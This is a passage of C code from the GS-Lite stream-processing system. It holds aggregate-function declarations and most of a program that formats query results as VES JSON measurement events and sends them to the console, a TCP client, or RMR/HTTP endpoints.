void LAST_INT_hfta_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
void LAST_INT_hfta_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void LAST_INT_hfta_HFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void LAST_ULL_hfta_HFTA_AGGR_INIT_(gs_uint64_t* scratch);
void LAST_ULL_hfta_HFTA_AGGR_REINIT_(gs_uint64_t* scratch);
void LAST_ULL_hfta_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
void LAST_ULL_hfta_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void LAST_ULL_hfta_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void LAST_LL_hfta_HFTA_AGGR_INIT_(gs_int64_t* scratch);
void LAST_LL_hfta_HFTA_AGGR_REINIT_(gs_int64_t* scratch);
void LAST_LL_hfta_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
void LAST_LL_hfta_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void LAST_LL_hfta_HFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void LAST_STR_hfta_HFTA_AGGR_INIT_(vstring* scratch);
void LAST_STR_hfta_HFTA_AGGR_REINIT_(vstring* scratch);
void LAST_STR_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val);
void LAST_STR_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch);
void LAST_STR_hfta_HFTA_AGGR_DESTROY_(vstring* scratch);
///////////////////////////////////////////////////////////////
// count_diff aggregate
///////////////////////////////////////////////////////////////
void count_diff_HFTA_AGGR_INIT_(gs_sp_t scratch);
void count_diff_HFTA_AGGR_REINIT_(gs_sp_t scratch);
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t scratch, gs_uint32_t val);
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t scratch, gs_int32_t val);
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t scratch, gs_uint64_t val);
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t scratch, gs_int64_t val);
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t scratch, vstring *val);
void count_diff_HFTA_AGGR_OUTPUT_(gs_uint32_t *res, gs_sp_t scratch);
void count_diff_HFTA_AGGR_DESTROY_(gs_sp_t scratch);
void count_diff_hfta_HFTA_AGGR_INIT_(gs_sp_t s);
void count_diff_hfta_HFTA_AGGR_REINIT_(gs_sp_t s);
void count_diff_hfta_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *val);
void count_diff_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t *res, gs_sp_t s);
void count_diff_hfta_HFTA_AGGR_DESTROY_(gs_sp_t scratch);
//////////////////////////////////////////////
// CAT_aggr, aggregate strings by catenation
//////////////////////////////////////////////
void CAT_aggr_HFTA_AGGR_INIT_(gs_sp_t s);
void CAT_aggr_HFTA_AGGR_REINIT_(gs_sp_t s);
void CAT_aggr_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *sep, vstring *str);
void CAT_aggr_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t s);
void CAT_aggr_HFTA_AGGR_DESTROY_(gs_sp_t s);
//////////////////////////////////////////////
// CAT_aggr, aggregate strings by catenation but only when the payload changes
//////////////////////////////////////////////
void CAT_aggr_diff_HFTA_AGGR_INIT_(gs_sp_t s);
void CAT_aggr_diff_HFTA_AGGR_REINIT_(gs_sp_t s);
void CAT_aggr_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *str);
void CAT_aggr_diff_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t s);
void CAT_aggr_diff_HFTA_AGGR_DESTROY_(gs_sp_t s);
/////////////////////////////////////////////////////////
// time-averaged sum, from aperiodic reports
////////////////////////////////////////////////////////
void time_avg_HFTA_AGGR_INIT_(gs_sp_t s);
void time_avg_HFTA_AGGR_DESTROY_(gs_sp_t s);
void time_avg_HFTA_AGGR_REINIT_(gs_sp_t s);
void time_avg_HFTA_AGGR_OUTPUT_(gs_float_t *result, gs_sp_t s);
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_float_t val, gs_int64_t ts, gs_int64_t window);
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t val, gs_int64_t ts, gs_int64_t window);
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t val, gs_int64_t ts, gs_int64_t window);
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t val, gs_int64_t ts, gs_int64_t window);
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t val, gs_int64_t ts, gs_int64_t window);
// ------------------------------------------------------------
// running_sum_max : get the running sum of an int,
// be able to report this sum and also its max value
// during the time window
// ------------------------------------------------------------
void run_sum_max_HFTA_AGGR_INIT_(gs_sp_t s);
void run_sum_max_HFTA_AGGR_REINIT_(gs_sp_t s);
void run_sum_max_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b);
void run_sum_max_HFTA_AGGR_DESTROY_(gs_sp_t b);
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t v);
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t v);
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t v);
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t v);
gs_int64_t extr_running_sum(vstring *v);
gs_int64_t extr_running_sum_max(vstring *v);
///////////////////////////////////////////////////////////////
// running_array_aggr aggregate
///////////////////////////////////////////////////////////////
void running_array_aggr_hfta_HFTA_AGGR_INIT_(vstring* scratch);
void running_array_aggr_hfta_HFTA_AGGR_REINIT_(vstring* scratch);
void running_array_aggr_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val);
void running_array_aggr_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch);
void running_array_aggr_hfta_HFTA_AGGR_DESTROY_(vstring* scratch);
////////////////////////////////////////////////////////////////
/// Flip's sample-based quantiles
/****************************************************************/
/* HFTA functions */
/****************************************************************/
// void quant_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t);
// void quant_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t, vstring *);
// void quant_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *, gs_sp_t);
// void quant_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t);
// gs_uint32_t extr_quant_hfta3_fcn(vstring *, gs_float_t);
// gs_uint32_t extr_med_hfta3_fcn(vstring *);
// gs_uint32_t extr_quant_hfta3_space(vstring *);
void quant_f_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_f_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void quant_f_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) ;
//gs_float_t extr_quant_f_hfta3_fcn(vstring *v, gs_float_t phi) ;
//gs_float_t extr_f_med_hfta3_fcn(vstring *v);
void quant_f_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) ;
void quant_ui_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_ui_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void quant_ui_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) ;
//gs_uint32_t extr_quant_ui_hfta3_fcn(vstring *v, gs_float_t phi) ;
//gs_uint32_t extr_ui_med_hfta3_fcn(vstring *v);
void quant_ui_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) ;
void quant_i_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_i_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void quant_i_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) ;
//gs_int32_t extr_quant_i_hfta3_fcn(vstring *v, gs_float_t phi) ;
//gs_int32_t extr_i_med_hfta3_fcn(vstring *v);
void quant_i_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) ;
void quant_ul_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_ul_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void quant_ul_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) ;
//gs_uint64_t extr_quant_ul_hfta3_fcn(vstring *v, gs_float_t phi) ;
//gs_uint64_t extr_ul_med_hfta3_fcn(vstring *v);
void quant_ul_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) ;
void quant_l_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_l_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void quant_l_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) ;
//gs_int64_t extr_quant_l_hfta3_fcn(vstring *v, gs_float_t phi) ;
//gs_int64_t extr_l_med_hfta3_fcn(vstring *v);
void quant_l_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) ;
/****************************************************************/
/* HFTA-only functions */
/****************************************************************/
// void quant_udaf_hfta0_HFTA_AGGR_INIT_(gs_sp_t);
// void quant_udaf_hfta0_HFTA_AGGR_UPDATE_(gs_sp_t, gs_uint32_t);
// void quant_udaf_hfta0_HFTA_AGGR_OUTPUT_(vstring *, gs_sp_t);
// void quant_udaf_hfta0_HFTA_AGGR_DESTROY_(gs_sp_t);
// gs_uint32_t extr_quant_hfta0_fcn(vstring *, gs_float_t);
// gs_uint32_t extr_med_hfta0_fcn(vstring *);
// gs_uint32_t extr_quant_hfta0_space(vstring *);
void quant_ui_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_ui_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v) ;
void quant_ui_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b);
void quant_ui_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b);
gs_uint32_t extr_quant_ui_hftaZ_fcn(vstring *v, gs_float_t phi) ;
gs_uint32_t extr_med_ui_hftaZ_fcn(vstring *v) ;
int quant_ui_udaf_hftaZ_nelem(gs_sp_t b) ;
void quant_ul_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_ul_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint64_t v) ;
void quant_ul_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b);
void quant_ul_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b);
gs_uint64_t extr_quant_ul_hftaZ_fcn(vstring *v, gs_float_t phi) ;
gs_uint64_t extr_med_ul_hftaZ_fcn(vstring *v) ;
int quant_ul_udaf_hftaZ_nelem(gs_sp_t b) ;
void quant_i_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_i_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_int32_t v) ;
void quant_i_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b);
void quant_i_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b);
gs_int32_t extr_quant_i_hftaZ_fcn(vstring *v, gs_float_t phi) ;
gs_int32_t extr_med_i_hftaZ_fcn(vstring *v) ;
int quant_i_udaf_hftaZ_nelem(gs_sp_t b) ;
void quant_l_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_l_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_int64_t v) ;
void quant_l_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b);
void quant_l_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b);
gs_int64_t extr_quant_l_hftaZ_fcn(vstring *v, gs_float_t phi) ;
gs_int64_t extr_med_l_hftaZ_fcn(vstring *v) ;
int quant_l_udaf_hftaZ_nelem(gs_sp_t b) ;
void quant_f_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_f_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_float_t v) ;
void quant_f_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b);
void quant_f_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b);
gs_float_t extr_quant_f_hftaZ_fcn(vstring *v, gs_float_t phi) ;
gs_float_t extr_med_f_hftaZ_fcn(vstring *v) ;
int quant_f_udaf_hftaZ_nelem(gs_sp_t b) ;
/****************************************************************/
// Approximate count distinct.
// Rely on the minhashing approach.
// Currently HFTA-only
// Uses a 32-bit hash, tested up to 100,000,000 elements
// and it gave good results (within 7%)
/****************************************************************/
// ---------------------------------------------
// HFTA-only
void approx_count_distinct_udaf_HFTA_AGGR_INIT_(gs_sp_t buf);
void approx_count_distinct_udaf_HFTA_AGGR_REINIT_(gs_sp_t buf);
void approx_count_distinct_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf);
void approx_count_distinct_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, vstring *val);
void approx_count_distinct_udaf_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t buf);
void running_approx_count_distinct_udaf_HFTA_AGGR_INIT_(gs_sp_t buf);
void running_approx_count_distinct_udaf_HFTA_AGGR_REINIT_(gs_sp_t buf);
void running_approx_count_distinct_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf);
void running_approx_count_distinct_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, vstring *val);
void running_approx_count_distinct_udaf_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t buf);
gs_float_t extr_approx_count_distinct(vstring *v);
#endif
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
/*
* Print ves formatted records to the console.
* Each line is a json record.
* Based on gsprintconsole.c, just differences in formatting.
*/
#include <app.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#ifdef RMR_ENABLED
#include <rmr/rmr.h>
#include <rmr/RIC_message_types.h>
#include <sys/epoll.h>
#endif
#include "gsconfig.h"
#include "gstypes.h"
#include "gshub.h"
#include "simple_http.h"
#include <schemaparser.h>
#define MAXLINE 100000
static unsigned tcpport=0;
static char linebuf[MAXLINE];
int listensockfd=0;
int fd=0;
// how frequently we will log stats (expressed in tuples posted)
#define STAT_FREQUENCY 5
// Not all systems have timersub defined, so make sure it's there
#ifndef timersub
#define timersub(tvp, uvp, vvp) \
do { \
(vvp)->tv_sec = (tvp)->tv_sec - (uvp)->tv_sec; \
(vvp)->tv_usec = (tvp)->tv_usec - (uvp)->tv_usec; \
if ((vvp)->tv_usec < 0) { \
(vvp)->tv_sec--; \
(vvp)->tv_usec += 1000000; \
} \
} while (0)
#endif
/* Signal handler: shut down the fta application layer, log which
 * signal triggered the exit, and terminate the process. */
void hand(int signum) {
	ftaapp_exit();
	fprintf(stderr, "exiting via signal handler %d...\n", signum);
	exit(1);
}
/* Block until a client connects on the configured tcp port.
 * Lazily creates, configures and binds the listening socket on first
 * use (fatal on failure), then accept()s in a loop until a valid
 * connection is obtained.  The connected descriptor is stored in the
 * global 'fd'.
 *
 * Fix: the loop condition used to be (fd==0), but accept() returns -1
 * on failure, so a failed accept left fd == -1 and the caller would
 * then write() to an invalid descriptor.  Loop while fd <= 0 so
 * failures are retried. */
static void wait_for_client() {
	struct sockaddr_in serv_addr,cli_addr;
	socklen_t clilen;
	if (listensockfd==0) {
		gs_int32_t on = 1;
		listensockfd=socket(AF_INET, SOCK_STREAM, 0);
		if (listensockfd < 0) {
			gslog(LOG_EMERG,"Error:Could not create socket for tcp data stream");
			exit(1);
		}
		bzero((char *) &serv_addr, sizeof(serv_addr));
		serv_addr.sin_family = AF_INET;
		serv_addr.sin_addr.s_addr = INADDR_ANY;
		serv_addr.sin_port = htons(tcpport);
#ifndef __linux__
		/* make sure we can reuse the common port rapidly */
		if (setsockopt(listensockfd, SOL_SOCKET, SO_REUSEPORT,
				(gs_sp_t )&on, sizeof(on)) != 0) {
			gslog(LOG_EMERG,"Error::could not set socket option");
			exit(1);
		}
#endif
		if (setsockopt(listensockfd, SOL_SOCKET, SO_REUSEADDR,
				(gs_sp_t )&on, sizeof(on)) != 0) {
			gslog(LOG_EMERG,"Error::could not set socket option");
			exit(1);
		}
		if (bind(listensockfd, (struct sockaddr *) &serv_addr,
				sizeof(serv_addr)) < 0) {
			gslog(LOG_EMERG,"Error:Could not bind socket for tcp data stream");
			exit(1);
		}
	}
	do {
		listen(listensockfd,5);
		clilen = sizeof(cli_addr);
		fd=accept(listensockfd, (struct sockaddr *) &cli_addr, &clilen);
		if (fd<0) {
			gslog(LOG_EMERG,"Error:Could not accept connection on tcp socket");
		}
	} while (fd<=0);	/* retry on accept() error (-1) as well as 0 */
}
/* Write the contents of the global 'linebuf' to the connected client
 * descriptor 'fd', handling partial writes.  On write error or client
 * disconnect, reconnect via wait_for_client() and resend the whole
 * line from the beginning (a new client should not receive a line
 * fragment).
 *
 * Fixes: (1) write()'s ssize_t return was stored in an unsigned, so a
 * -1 error became a huge offset and corrupted the loop arithmetic;
 * (2) the retry wrote 'l' bytes starting at &linebuf[o], reading past
 * the end of the buffer after a partial write — it must write the
 * remaining l-o bytes. */
static void emit_socket() {
	size_t o = 0;
	size_t l = strlen(linebuf);
	while (o < l) {
		ssize_t w = write(fd, &linebuf[o], l - o);
		if (w <= 0) {
			/* error or disconnect: get a new client, restart the line */
			close(fd);
			wait_for_client();
			o = 0;
			continue;
		}
		o += (size_t)w;
	}
}
/* Emit one completed output line: over the tcp connection when a
 * port was configured, otherwise to stdout. */
static void emit_line() {
	if (tcpport != 0) {
		emit_socket();
	} else {
		printf("%s",linebuf);
	}
}
int main(int argc, char* argv[]) {
gs_sp_t me = argv[0];
FTAID fta_id;
gs_int32_t schema, ch;
FTAID rfta_id;
gs_uint32_t rsize;
gs_uint32_t bufsz=8*1024*1024;
gs_int8_t rbuf[2*MAXTUPLESZ];
gs_int32_t numberoffields;
gs_int32_t verbose=0;
gs_int32_t y, lcv;
void *pblk;
gs_int32_t pblklen;
gs_int32_t n_actual_param;
gs_int32_t n_expected_param;
gs_int32_t xit = 0;
gs_int32_t dump = 0;
struct timeval tvs, tve, tvd;
gs_retval_t code;
endpoint gshub;
endpoint dummyep;
gs_uint32_t tip1,tip2,tip3,tip4;
gs_sp_t instance_name;
gs_sp_t rmr_port = NULL;
#ifdef RMR_ENABLED
// RMR-related parameters
gs_int32_t rmr_mtype = MC_REPORT;
#endif
gs_sp_t curl_address = NULL;
endpoint curl_endpoint;
gs_sp_t curl_url = NULL;
gs_sp_t curl_auth = NULL;
gs_uint32_t http_code;
gs_uint32_t ves_version=7;
gs_uint32_t tlimit = 0; // time limit in seconds
time_t start_time, curr_time;
gs_uint64_t post_success_cnt = 0ULL;
gs_uint64_t post_failure_cnt = 0ULL;
#ifdef RMR_ENABLED
void* mrc; //msg router context
struct epoll_event events[1]; // list of events to give to epoll
struct epoll_event epe; // event definition for event to listen to
gs_int32_t ep_fd = -1; // epoll's file des (given to epoll_wait)
gs_int32_t rcv_fd; // file des that NNG tickles -- give this to epoll to listen on
gs_int32_t nready; // number of events ready for receive
rmr_mbuf_t* rmr_sbuf; // send buffer
rmr_mbuf_t* rmr_rbuf; // received buffer
gs_uint64_t rmr_post_success_cnt = 0ULL;
gs_uint64_t rmr_post_failure_cnt = 0ULL;
#endif
gsopenlog(argv[0]);
while ((ch = getopt(argc, argv, "l:p:r:vXDC:U:R:A:V:")) != -1) {
switch (ch) {
case 'r':
bufsz=atoi(optarg);
break;
case 'p':
tcpport=atoi(optarg);
break;
case 'v':
verbose++;
break;
case 'X':
xit++;
break;
case 'D':
dump++;
break;
case 'l':
tlimit = atoi(optarg);
break;
case 'V':
ves_version = atoi(optarg);
break;
case 'C':
curl_address = strdup(optarg);
if (sscanf(curl_address,"%u.%u.%u.%u:%hu",&tip1,&tip2,&tip3,&tip4,&(curl_endpoint.port))!= 5 ) {
gslog(LOG_EMERG,"Curl IP NOT DEFINED");
exit(1);
}
curl_endpoint.ip=htonl(tip1<<24|tip2<<16|tip3<<8|tip4);
curl_endpoint.port=htons(curl_endpoint.port);
break;
case 'R':
rmr_port=strdup(optarg);
break;
case 'U':
curl_url = strdup(optarg);
break;
case 'A':
curl_auth = strdup(optarg);
break;
default:
usage:
fprintf(stderr, "usage: %s [-r <bufsz>] [-p <port>] [-l <time_limit>] [-v] [-X] [-D] [-C <curl_dest>:<curl_port>] [-U <curl_url>] [-A <authentication_string>] [-V <ves_version>] [-R <rmr_port>] <gshub-hostname>:<gshub-port> <gsinstance_name> query param1 param2...\n",
*argv);
exit(1);
}
}
argc -= optind;
argv += optind;
if (argc<3) goto usage;
if (sscanf(argv[0],"%u.%u.%u.%u:%hu",&tip1,&tip2,&tip3,&tip4,&(gshub.port))!= 5 ) {
gslog(LOG_EMERG,"HUB IP NOT DEFINED");
exit(1);
}
gshub.ip=htonl(tip1<<24|tip2<<16|tip3<<8|tip4);
gshub.port=htons(gshub.port);
instance_name=strdup(argv[1]);
if (set_hub(gshub)!=0) {
gslog(LOG_EMERG,"Could not set hub");
exit(1);
}
if (set_instance_name(instance_name)!=0) {
gslog(LOG_EMERG,"Could not set instance name");
exit(1);
}
if (get_initinstance(gshub,instance_name,&dummyep,1)!=0) {
gslog(LOG_EMERG,"Did not receive signal that GS is initiated");
}
// If this uses curl output, ensure consistency in the curl args
if(curl_address != NULL){
if(curl_url == NULL){
gslog(LOG_EMERG,"Curl IP defined, but there is no url (e.g. /foo/bar");
exit(1);
}
if(curl_auth==NULL){
curl_auth = "";
}
}
gettimeofday(&tvs, 0);
argc -=2;
argv +=2;
if (argc < 1)
goto usage;
if (rmr_port) {
#ifdef RMR_ENABLED
/* initialize RMR library */
if( (mrc = rmr_init( rmr_port, 1400, RMRFL_NONE )) == NULL ) {
fprintf(stderr, "%s::error:unable to initialise RMR\n", me);
exit( 1 );
}
rcv_fd = rmr_get_rcvfd( mrc ); // set up epoll things, start by getting the FD from MRr
if( rcv_fd < 0 ) {
fprintf(stderr, "%s::error:unable to set up polling fd\n", me);
exit( 1 );
}
if( (ep_fd = epoll_create1( 0 )) < 0 ) {
fprintf(stderr, "%s::error:unable to create epoll fd: %d\n", me, errno);
exit( 1 );
}
epe.events = EPOLLIN;
epe.data.fd = rcv_fd;
if( epoll_ctl( ep_fd, EPOLL_CTL_ADD, rcv_fd, &epe ) != 0 ) {
fprintf(stderr, "%s::error:epoll_ctl status not 0 : %s\n", me, strerror(errno));
exit( 1 );
}
rmr_sbuf = rmr_alloc_msg( mrc, MAXLINE ); // alloc first send buffer; subsequent buffers allocated on send
rmr_rbuf = NULL; // don't need to alloc receive buffer
while( ! rmr_ready( mrc ) ) { // must have a route table before we can send; wait til RMr say it has one
sleep( 10 );
}
fprintf( stderr, "%s: RMR is ready\n", argv[0]);
#else
fprintf(stderr,"Runtime libraries built without RMR support. Rebuild with RMR_ENABLED defined in gsoptions.h\n");
exit(0);
#endif
}
/* initialize host library and the sgroup */
if (verbose>=2) fprintf(stderr,"Initializing gscp\n");
if (ftaapp_init(bufsz)!=0) {
fprintf(stderr,"%s::error:could not initialize gscp\n", me);
exit(1);
}
signal(SIGTERM, hand);
signal(SIGINT, hand);
schema = ftaapp_get_fta_schema_by_name(argv[0]);
if (schema < 0) {
fprintf(stderr,"%s::error:could not get fta '%s' schema\n",
me ,argv[0]);
exit(1);
}
n_expected_param = ftaschema_parameter_len(schema);
if (n_expected_param == 0) {
pblk = 0;
pblklen = 0;
} else {
n_actual_param = argc-1;
if(n_actual_param < n_expected_param){
fprintf(stderr,"Error, %d query parameters expected, %d provided.\n",n_expected_param, n_actual_param);
exit(1);
}
/* parse the params */
for (lcv = 1 ; lcv < argc ; lcv++) {
char *k, *e;
int rv;
k = argv[lcv];
e = k;
while (*e && *e != '=') e++;
if (*e == 0) {
fprintf(stderr,"param parse error '%s' (fmt 'key=val')\n",
argv[lcv]);
exit(1);
}
*e = 0;
rv = ftaschema_setparam_by_name(schema, k, e+1, strlen(e+1));
*e = '=';
if (rv < 0) {
fprintf(stderr,"param setparam error '%s' (fmt 'key=val')\n",
argv[lcv]);
exit(1);
}
}
if (ftaschema_create_param_block(schema, &pblk, &pblklen) < 0) {
fprintf(stderr, "ftaschema_create_param_block failed!\n");
exit(1);
}
}
// ftaschema_free(schema); /* XXXCDC */ // the schema continues to be used
if (verbose>=2) fprintf(stderr,"Initalized FTA\n");
fta_id=ftaapp_add_fta(argv[0],0,0,0,pblklen,pblk);
if (fta_id.streamid==0) {
fprintf(stderr,"%s::error:could not initialize fta %s\n",
me, argv[0]);
exit(1);
}
/* XXXCDC: pblk is malloc'd, should we free it? */
if (verbose>=2) fprintf(stderr,"Get schema handle\n");
if ((schema=ftaapp_get_fta_schema(fta_id))<0) {
fprintf(stderr,"%s::error:could not get schema\n", me);
exit(1);
}
if ((numberoffields=ftaschema_tuple_len(schema))<0) {
fprintf(stderr,"%s::error:could not get number of fields in schema\n",
me);
exit(1);
}
if (verbose>=1) {
for(y=0; y<numberoffields;y++) {
printf("%s",ftaschema_field_name(schema,y));
if (y<numberoffields-1) printf("|");
}
printf("\n");
}
if (xit) { // -X in command line
gettimeofday(&tve, 0);
timersub(&tve, &tvs, &tvd);
printf("TIME= %ld%06d sec\n", tvd.tv_sec, tvd.tv_usec);
hand(0); // effectively an exit
}
if (tcpport!=0) {
wait_for_client();
}
start_time = time(NULL);
int measurement_interval_pos = -1; // extract measurementInterval if present
char *field_names[numberoffields];
for(y=0; y<numberoffields;y++) {
field_names[y] = strdup(ftaschema_field_name(schema,y));
if(strcmp(field_names[y], "measurementInterval")==0)
measurement_interval_pos = y;
}
struct timeval tsample;
gettimeofday(&tsample, 0);
char start_ts[100], curr_ts[100];
sprintf(start_ts,"%ld%06d", tsample.tv_sec, tsample.tv_usec);
long unsigned int lineno=0;
long unsigned int seqno=0;
double measurement_interval;
while((code=ftaapp_get_tuple(&rfta_id,&rsize,rbuf,2*MAXTUPLESZ,0))>=0) {
lineno++;
if (dump) // -D in command line
continue;
if (ftaschema_is_eof_tuple(schema, rbuf)) {
/* initiate shutdown or something of that nature */
printf("#All data proccessed\n");
exit(0);
}
if (!rsize)
continue;
if (verbose >=2) {
snprintf(linebuf,MAXLINE,"RESULT CODE => %u\n",code);
emit_line();
}
if ((code==0)&&(rfta_id.streamid == fta_id.streamid)) {
seqno++;
gettimeofday(&tsample, 0);
sprintf(curr_ts,"%ld%06d", tsample.tv_sec, tsample.tv_usec);
int pos;
if(ves_version < 7){
pos = snprintf(linebuf, MAXLINE,
"{\"event\": { \"commonEventHeader\": { "
"\"domain\": \"measurementsForVfScaling\", "
"\"eventId\": \"%s%u\", "
"\"eventType\": \"%s\", "
"\"eventName\": \"Measurement_MC_%s\", "
"\"lastEpochMicrosec\": %s, "
"\"priority\": \"Normal\", "
"\"reportingEntityName\": \"GS-LITE MC\", "
"\"sequence\": %u, "
"\"sourceName\": \"meas_cmpgn_xapp\", "
"\"startEpochMicrosec\": %s, "
"\"version\": 5 "
"}, "
"\"measurementsForVfScalingFields\": { "
"\"additionalFields\": ["
,argv[0],lineno, argv[0], argv[0], curr_ts, seqno, start_ts
);
}else{
pos = snprintf(linebuf, MAXLINE,
"{\"event\": { \"commonEventHeader\": { "
"\"domain\": \"measurement\", "
"\"eventId\": \"%s%u\", "
"\"eventType\": \"%s\", "
"\"eventName\": \"Measurement_MC_%s\", "
"\"lastEpochMicrosec\": %s, "
"\"priority\": \"Normal\", "
"\"reportingEntityName\": \"GS-LITE MC\", "
"\"sequence\": %u, "
"\"sourceName\": \"meas_cmpgn_xapp\", "
"\"startEpochMicrosec\": %s, "
"\"version\": \"4.0.1\", "
"\"vesEventListenerVersion\": \"7.0.1\" "
"}, "
"\"measurementFields\": { "
"\"additionalFields\": {"
,argv[0],lineno, argv[0], argv[0], curr_ts, seqno, start_ts
);
}
measurement_interval = 0;
for(y=0; y<numberoffields;y++) {
struct access_result ar;
// if (verbose>=2)
// printf("%s->",ftaschema_field_name(schema,y));
if(y>0){
linebuf[pos]=',';
pos++;
}
ar=ftaschema_get_field_by_index(schema,y,rbuf,rsize);
switch (ar.field_data_type) {
case INT_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%d\"}",field_names[y], ar.r.i);
else
pos += snprintf(linebuf+pos,MAXLINE-pos," \"%s\": \"%d\"",field_names[y], ar.r.i);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.i;
break;
case UINT_TYPE:
if(ves_version < 7)
